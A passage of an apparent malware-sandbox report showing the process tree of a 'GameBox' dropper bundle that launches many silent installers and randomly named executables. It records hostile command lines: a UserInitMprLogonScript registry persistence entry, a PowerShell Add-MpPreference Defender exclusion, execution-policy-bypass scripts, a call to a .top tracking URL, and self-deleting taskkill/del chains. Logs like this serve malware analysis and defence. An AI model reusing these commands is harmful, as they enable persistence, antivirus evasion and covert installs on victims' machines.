                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:4892
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                  5⤵
                                                                    PID:5988
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-GA3VH.tmp\Inlog.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-GA3VH.tmp\Inlog.tmp" /SL5="$3022E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:4816
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-SBL31.tmp\Setup.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-SBL31.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                        7⤵
                                                                          PID:7996
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-SA5VM.tmp\Setup.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-SA5VM.tmp\Setup.tmp" /SL5="$1057A,17339287,721408,C:\Users\Admin\AppData\Local\Temp\is-SBL31.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                            8⤵
                                                                              PID:7380
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-SPOJL.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                9⤵
                                                                                  PID:7124
                                                                                  • C:\Windows\SysWOW64\expand.exe
                                                                                    expand C:\Users\Admin\AppData\Local\Temp\is-SPOJL.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                    10⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2356
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                  9⤵
                                                                                    PID:9076
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                      10⤵
                                                                                        PID:5448
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-SPOJL.tmp\{app}\vdi_compiler.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-SPOJL.tmp\{app}\vdi_compiler"
                                                                                      9⤵
                                                                                        PID:9188
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                        9⤵
                                                                                          PID:4756
                                                                                        • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                          "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                          9⤵
                                                                                            PID:7768
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:6084
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-HG1FV.tmp\WEATHER Manager.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-HG1FV.tmp\WEATHER Manager.tmp" /SL5="$1035A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:5072
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-PO12C.tmp\Setup.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-PO12C.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                        7⤵
                                                                                          PID:6380
                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-PO12C.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-PO12C.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629550565 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4648
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6116
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-UFEB8.tmp\MediaBurner2.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-UFEB8.tmp\MediaBurner2.tmp" /SL5="$1037A,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:5404
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-S7CR0.tmp\ultradumnibour.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-S7CR0.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                          7⤵
                                                                                            PID:5460
                                                                                            • C:\Program Files\Windows Defender Advanced Threat Protection\FMBVWMVATB\ultramediaburner.exe
                                                                                              "C:\Program Files\Windows Defender Advanced Threat Protection\FMBVWMVATB\ultramediaburner.exe" /VERYSILENT
                                                                                              8⤵
                                                                                                PID:7260
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-A3U4L.tmp\ultramediaburner.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-A3U4L.tmp\ultramediaburner.tmp" /SL5="$10582,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\FMBVWMVATB\ultramediaburner.exe" /VERYSILENT
                                                                                                  9⤵
                                                                                                    PID:3112
                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                      10⤵
                                                                                                        PID:5432
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\88-78651-497-c7ebc-439b35cee0497\Qyxolusiwu.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\88-78651-497-c7ebc-439b35cee0497\Qyxolusiwu.exe"
                                                                                                    8⤵
                                                                                                      PID:7388
                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                        dw20.exe -x -s 1344
                                                                                                        9⤵
                                                                                                          PID:3792
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\37-1ea22-235-23f9f-f13ab97d513e1\Dosilaetezha.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\37-1ea22-235-23f9f-f13ab97d513e1\Dosilaetezha.exe"
                                                                                                        8⤵
                                                                                                          PID:5344
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    PID:652
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-L5AP0.tmp\VPN.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-L5AP0.tmp\VPN.tmp" /SL5="$50300,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:5496
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-G8RO8.tmp\Setup.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-G8RO8.tmp\Setup.exe" /silent /subid=720
                                                                                                        7⤵
                                                                                                          PID:7968
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-F3CLM.tmp\Setup.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-F3CLM.tmp\Setup.tmp" /SL5="$30284,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-G8RO8.tmp\Setup.exe" /silent /subid=720
                                                                                                            8⤵
                                                                                                              PID:7236
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                9⤵
                                                                                                                  PID:5932
                                                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                    tapinstall.exe remove tap0901
                                                                                                                    10⤵
                                                                                                                      PID:7316
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                    9⤵
                                                                                                                      PID:6848
                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                                                                        10⤵
                                                                                                                          PID:7756
                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                        9⤵
                                                                                                                          PID:7860
                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                          9⤵
                                                                                                                            PID:8652
                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    PID:6036
                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629550565 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                      6⤵
                                                                                                                      • Blocklisted process makes network request
                                                                                                                      • Drops file in Drivers directory
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      PID:5460
                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5324
                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                      6⤵
                                                                                                                        PID:5664
                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:372
                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
                                                                                                                        6⤵
                                                                                                                          PID:7644
                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
                                                                                                                          6⤵
                                                                                                                            PID:7668
                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
                                                                                                                            6⤵
                                                                                                                              PID:7684
                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks computer location settings
                                                                                                                            PID:5440
                                                                                                                            • C:\Users\Admin\Documents\3vRBWBf5KP7Dsn5cjvWmwQ0k.exe
                                                                                                                              "C:\Users\Admin\Documents\3vRBWBf5KP7Dsn5cjvWmwQ0k.exe"
                                                                                                                              6⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:6756
                                                                                                                              • C:\Users\Admin\Documents\3vRBWBf5KP7Dsn5cjvWmwQ0k.exe
                                                                                                                                C:\Users\Admin\Documents\3vRBWBf5KP7Dsn5cjvWmwQ0k.exe
                                                                                                                                7⤵
                                                                                                                                  PID:5620
                                                                                                                              • C:\Users\Admin\Documents\sotNAFDC6_GC1DvvglJrDt5C.exe
                                                                                                                                "C:\Users\Admin\Documents\sotNAFDC6_GC1DvvglJrDt5C.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:6868
                                                                                                                                  • C:\Users\Admin\Documents\sotNAFDC6_GC1DvvglJrDt5C.exe
                                                                                                                                    "C:\Users\Admin\Documents\sotNAFDC6_GC1DvvglJrDt5C.exe" -q
                                                                                                                                    7⤵
                                                                                                                                      PID:8080
                                                                                                                                  • C:\Users\Admin\Documents\SWvZBXbSOI8I9wQ7vwk0Iw73.exe
                                                                                                                                    "C:\Users\Admin\Documents\SWvZBXbSOI8I9wQ7vwk0Iw73.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:6976
                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\SWVZBX~1.DLL,s C:\Users\Admin\DOCUME~1\SWVZBX~1.EXE
                                                                                                                                        7⤵
                                                                                                                                          PID:2216
                                                                                                                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\SWVZBX~1.DLL,AgACOXFRRA==
                                                                                                                                            8⤵
                                                                                                                                              PID:8092
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\SWVZBX~1.DLL
                                                                                                                                                9⤵
                                                                                                                                                  PID:8044
                                                                                                                                                • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                  C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\SWVZBX~1.DLL,WAVSVA==
                                                                                                                                                  9⤵
                                                                                                                                                    PID:4448
                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                      C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
                                                                                                                                                      10⤵
                                                                                                                                                        PID:6800
                                                                                                                                                        • C:\Windows\system32\ctfmon.exe
                                                                                                                                                          ctfmon.exe
                                                                                                                                                          11⤵
                                                                                                                                                            PID:1096
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpAD9E.tmp.ps1"
                                                                                                                                                        9⤵
                                                                                                                                                          PID:8768
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpE6D9.tmp.ps1"
                                                                                                                                                          9⤵
                                                                                                                                                            PID:9568
                                                                                                                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                              "C:\Windows\system32\nslookup.exe" -type=any localhost
                                                                                                                                                              10⤵
                                                                                                                                                                PID:4424
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                                              9⤵
                                                                                                                                                                PID:6084
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:9892
                                                                                                                                                          • C:\Users\Admin\Documents\qGwq2Wzn0L0_wE8mAA7eH9Yu.exe
                                                                                                                                                            "C:\Users\Admin\Documents\qGwq2Wzn0L0_wE8mAA7eH9Yu.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:7060
                                                                                                                                                          • C:\Users\Admin\Documents\z0d4xOxmDv8g1zFSJkGJSl4C.exe
                                                                                                                                                            "C:\Users\Admin\Documents\z0d4xOxmDv8g1zFSJkGJSl4C.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:7100
                                                                                                                                                            • C:\Users\Admin\Documents\z0d4xOxmDv8g1zFSJkGJSl4C.exe
                                                                                                                                                              C:\Users\Admin\Documents\z0d4xOxmDv8g1zFSJkGJSl4C.exe
                                                                                                                                                              7⤵
                                                                                                                                                                PID:6804
                                                                                                                                                              • C:\Users\Admin\Documents\z0d4xOxmDv8g1zFSJkGJSl4C.exe
                                                                                                                                                                C:\Users\Admin\Documents\z0d4xOxmDv8g1zFSJkGJSl4C.exe
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:4692
                                                                                                                                                              • C:\Users\Admin\Documents\205Vo5DWNoPaGZrjYojUCs0o.exe
                                                                                                                                                                "C:\Users\Admin\Documents\205Vo5DWNoPaGZrjYojUCs0o.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                PID:7156
                                                                                                                                                              • C:\Users\Admin\Documents\eGcwKhnvzHhbGNhMk9MO6yoP.exe
                                                                                                                                                                "C:\Users\Admin\Documents\eGcwKhnvzHhbGNhMk9MO6yoP.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:7112
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-4S4RJ.tmp\eGcwKhnvzHhbGNhMk9MO6yoP.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-4S4RJ.tmp\eGcwKhnvzHhbGNhMk9MO6yoP.tmp" /SL5="$2050A,138429,56832,C:\Users\Admin\Documents\eGcwKhnvzHhbGNhMk9MO6yoP.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:6264
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-LIC02.tmp\Setup.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-LIC02.tmp\Setup.exe" /Verysilent
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:6392
                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:7928
                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629550565 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:6548
                                                                                                                                                                      • C:\Users\Admin\Documents\EdBFeVgZnULYe2sS12OSu1pX.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\EdBFeVgZnULYe2sS12OSu1pX.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:6280
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\2964254.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\2964254.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:6868
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7814883.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7814883.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:6920
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4220385.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4220385.exe"
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:6136
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\5048853.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\5048853.exe"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:7076
                                                                                                                                                                                • C:\Users\Admin\Documents\9ixhWODm_GBtwBAQsOudJjWU.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\9ixhWODm_GBtwBAQsOudJjWU.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                  PID:4172
                                                                                                                                                                                • C:\Users\Admin\Documents\QHoAqKK8t4ZNALPhrPp7M3lE.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\QHoAqKK8t4ZNALPhrPp7M3lE.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:5016
                                                                                                                                                                                  • C:\Users\Admin\Documents\p3GhqZcaIN6Wv8MvNbGbN7g8.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\p3GhqZcaIN6Wv8MvNbGbN7g8.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:5092
                                                                                                                                                                                  • C:\Users\Admin\Documents\mfVdCMgpHQ9eMOeBDn6ttaw9.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\mfVdCMgpHQ9eMOeBDn6ttaw9.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:6752
                                                                                                                                                                                      • C:\Users\Admin\Documents\mfVdCMgpHQ9eMOeBDn6ttaw9.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\mfVdCMgpHQ9eMOeBDn6ttaw9.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                          PID:6120
                                                                                                                                                                                        • C:\Users\Admin\Documents\mfVdCMgpHQ9eMOeBDn6ttaw9.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\mfVdCMgpHQ9eMOeBDn6ttaw9.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:4428
                                                                                                                                                                                        • C:\Users\Admin\Documents\x3t2jnCYHFtqj_wtfQYJjBSv.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\x3t2jnCYHFtqj_wtfQYJjBSv.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:6932
                                                                                                                                                                                            • C:\Users\Admin\Documents\x3t2jnCYHFtqj_wtfQYJjBSv.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\x3t2jnCYHFtqj_wtfQYJjBSv.exe"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:9900
                                                                                                                                                                                            • C:\Users\Admin\Documents\oVIFN4X9nzpk8hZ_8shf28c1.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\oVIFN4X9nzpk8hZ_8shf28c1.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:6816
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im oVIFN4X9nzpk8hZ_8shf28c1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\oVIFN4X9nzpk8hZ_8shf28c1.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                    PID:3588
                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                      taskkill /im oVIFN4X9nzpk8hZ_8shf28c1.exe /f
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                      PID:6408
                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                      PID:9140
                                                                                                                                                                                                • C:\Users\Admin\Documents\yBxAgLXKWzWoSnYbnGQ4CVaj.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\yBxAgLXKWzWoSnYbnGQ4CVaj.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  PID:6468
                                                                                                                                                                                                • C:\Users\Admin\Documents\ESITLLP8yVzanEwbvxsdrTip.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\ESITLLP8yVzanEwbvxsdrTip.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:6960
                                                                                                                                                                                                  • C:\Users\Admin\Documents\lHx0wkxYZgYPvaCEVYingP8s.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\lHx0wkxYZgYPvaCEVYingP8s.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:6088
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "lHx0wkxYZgYPvaCEVYingP8s.exe" /f & erase "C:\Users\Admin\Documents\lHx0wkxYZgYPvaCEVYingP8s.exe" & exit
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                        PID:6380
                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                          taskkill /im "lHx0wkxYZgYPvaCEVYingP8s.exe" /f
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:6812
                                                                                                                                                                                                    • C:\Users\Admin\Documents\ATYqWPl9mJIzni5A33U7IkqT.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\ATYqWPl9mJIzni5A33U7IkqT.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:2612
                                                                                                                                                                                                      • C:\Users\Admin\Documents\YShagwRSZ4o193LccG9Nxw_P.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\YShagwRSZ4o193LccG9Nxw_P.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:6448
                                                                                                                                                                                                        • C:\Users\Admin\Documents\aKYeyaixO2hoqIoudfCDNqz1.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\aKYeyaixO2hoqIoudfCDNqz1.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                          PID:6308
                                                                                                                                                                                                        • C:\Users\Admin\Documents\zr6m_G1smxjPoUF79TfqxtCG.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\zr6m_G1smxjPoUF79TfqxtCG.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:1284
                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
